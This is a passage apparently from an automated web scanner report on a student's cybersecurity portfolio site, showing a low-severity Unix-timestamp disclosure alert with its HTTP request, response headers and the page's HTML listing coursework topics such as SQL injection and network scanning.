          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          2000000000
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        19. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          254375293, which evaluates to: 1978-01-23 04:48:13

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
